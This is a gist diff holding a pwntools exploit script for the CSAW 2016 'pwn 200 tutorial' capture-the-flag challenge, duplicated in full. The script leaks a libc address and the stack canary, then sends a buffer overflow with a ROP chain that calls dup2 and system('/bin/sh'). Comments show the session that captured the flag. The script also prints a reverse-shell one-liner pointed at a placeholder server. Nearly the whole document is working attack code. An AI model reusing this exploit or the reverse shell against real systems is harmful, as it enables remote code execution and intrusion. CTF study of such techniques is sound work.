hugsy · October 3, 2016 14:34
diff --git a/gistfile1.py b/gistfile1.py
 #
 # CSAW 2016 - pwn 200 - tutorial
 #
 # @_hugsy_
 #
 # tutorial@9c7e30ba54b6:/home/tutorial$ ls
 # ~/cur/tutorial $ py xpl.py
 # [+] Opening connection to pwn.chal.csaw.io on port 8002: Done
 # [*] Got 0x7f60e48eb860
 # [*] libc is 0x7f60e487c000
 # [*] system@libc is 0x7f60e48c2590
 # [*] got canary 0xbad86d7361e80200
 # [*] payload length ok (432)
 # [*] copy/paste : # bash -c "bash -i >& /dev/tcp/my.server/1337 0>&1"
 # [*] Switching to interactive mode
 # AAAA[...]
 # tutorial@9c7e30ba54b6:/home/tutorial$ ls
 # ls
 # flag.txt
 # tutorial
 # tutorial.c
 # tutorial@9c7e30ba54b6:/home/tutorial$ cat flag.txt
 # cat flag.txt
 # FLAG{3ASY_R0P_R0P_P0P_P0P_YUM_YUM_CHUM_CHUM}
 # tutorial@9c7e30ba54b6:/home/tutorial$
 from pwn import *

 #context.log_level = "debug"
 context.update(arch='amd64', os='linux')

 # r = remote("172.28.128.5", 8002)
 r = remote("pwn.chal.csaw.io", 8002)

 # raw_input("attach to gdb")

 # leak libc.text addr
 r.recvuntil(">")
 r.sendline("1")
 r.recvuntil("Reference:")
 addr = int(r.recvuntil("\n"), 16)
 log.info("Got %#x" % addr)
 libc_base = addr - 0x6f860
 log.info("libc is %#x" % libc_base)
 system_addr = libc_base + 0x46590
 log.info("system@libc is %#x" % system_addr)

 # leak canary
 r.recvuntil(">")
 r.sendline("2")
 r.recvuntil(">")
 r.send("A"*312)
 data = r.recv(324)
 canary = data[312:320]
 canary = u64(canary)
 log.info("got canary %#x" % canary)


 # attack !!
 bss_addr = 0x602200
 r.recvuntil(">")
 r.sendline("2")
 r.recvuntil(">")
 p = "A"*312+p64(canary)
 p+= "JUNK"*2

 ## rop syscall(dup2(4, stdin))
 p+= p64(libc_base + 0x0000000000022b9a) # pop rdi ; ret
 p+= p64(4)
 p+= p64(libc_base + 0x0000000000024885) # pop rsi ; ret
 p+= p64(0)
 p+= p64(libc_base + 0x000000000001b290) # pop rax ; ret
 p+= p64(33) # sys_dup2
 p+= p64(libc_base + 0x00000000000c1d05) # syscall

 ## rop system(/bin/sh)
 p+= p64(libc_base + 0x0000000000022b9a) # pop rdi ; ret
 p+= p64(bss_addr)
 p+= p64(libc_base + 0x0000000000001b8e) # pop rdx ; ret
 p+= "/bin/sh\x00"
 p+= p64(libc_base + 0x0000000000096c7f) # mov qword ptr [rdi], rdx ; ret
 p+= p64(system_addr)

 assert(len(p)<=460)
 log.info("payload length ok (%d)" % len(p))
 log.info("""copy/paste : # bash -c "bash -i >& /dev/tcp/my.server/1337 0>&1" """)
 r.send(p)
 r.interactive()
	#
	# CSAW 2016 - pwn 200 - tutorial
	#
	# @_hugsy_
	#
	# tutorial@9c7e30ba54b6:/home/tutorial$ ls
	# ~/cur/tutorial $ py xpl.py
	# [+] Opening connection to pwn.chal.csaw.io on port 8002: Done
	# [*] Got 0x7f60e48eb860
	# [*] libc is 0x7f60e487c000
	# [*] system@libc is 0x7f60e48c2590
	# [*] got canary 0xbad86d7361e80200
	# [*] payload length ok (432)
	# [*] copy/paste : # bash -c "bash -i >& /dev/tcp/my.server/1337 0>&1"
	# [*] Switching to interactive mode
	# AAAA[...]
	# tutorial@9c7e30ba54b6:/home/tutorial$ ls
	# ls
	# flag.txt
	# tutorial
	# tutorial.c
	# tutorial@9c7e30ba54b6:/home/tutorial$ cat flag.txt
	# cat flag.txt
	# FLAG{3ASY_R0P_R0P_P0P_P0P_YUM_YUM_CHUM_CHUM}
	# tutorial@9c7e30ba54b6:/home/tutorial$
	from pwn import *

	#context.log_level = "debug"
	context.update(arch='amd64', os='linux')

	# r = remote("172.28.128.5", 8002)
	r = remote("pwn.chal.csaw.io", 8002)

	# raw_input("attach to gdb")

	# leak libc.text addr
	r.recvuntil(">")
	r.sendline("1")
	r.recvuntil("Reference:")
	addr = int(r.recvuntil("\n"), 16)
	log.info("Got %#x" % addr)
	libc_base = addr - 0x6f860
	log.info("libc is %#x" % libc_base)
	system_addr = libc_base + 0x46590
	log.info("system@libc is %#x" % system_addr)

	# leak canary
	r.recvuntil(">")
	r.sendline("2")
	r.recvuntil(">")
	r.send("A"*312)
	data = r.recv(324)
	canary = data[312:320]
	canary = u64(canary)
	log.info("got canary %#x" % canary)


	# attack !!
	bss_addr = 0x602200
	r.recvuntil(">")
	r.sendline("2")
	r.recvuntil(">")
	p = "A"*312+p64(canary)
	p+= "JUNK"*2

	## rop syscall(dup2(4, stdin))
	p+= p64(libc_base + 0x0000000000022b9a) # pop rdi ; ret
	p+= p64(4)
	p+= p64(libc_base + 0x0000000000024885) # pop rsi ; ret
	p+= p64(0)
	p+= p64(libc_base + 0x000000000001b290) # pop rax ; ret
	p+= p64(33) # sys_dup2
	p+= p64(libc_base + 0x00000000000c1d05) # syscall

	## rop system(/bin/sh)
	p+= p64(libc_base + 0x0000000000022b9a) # pop rdi ; ret
	p+= p64(bss_addr)
	p+= p64(libc_base + 0x0000000000001b8e) # pop rdx ; ret
	p+= "/bin/sh\x00"
	p+= p64(libc_base + 0x0000000000096c7f) # mov qword ptr [rdi], rdx ; ret
	p+= p64(system_addr)

	assert(len(p)<=460)
	log.info("payload length ok (%d)" % len(p))
	log.info("""copy/paste : # bash -c "bash -i >& /dev/tcp/my.server/1337 0>&1" """)
	r.send(p)
	r.interactive()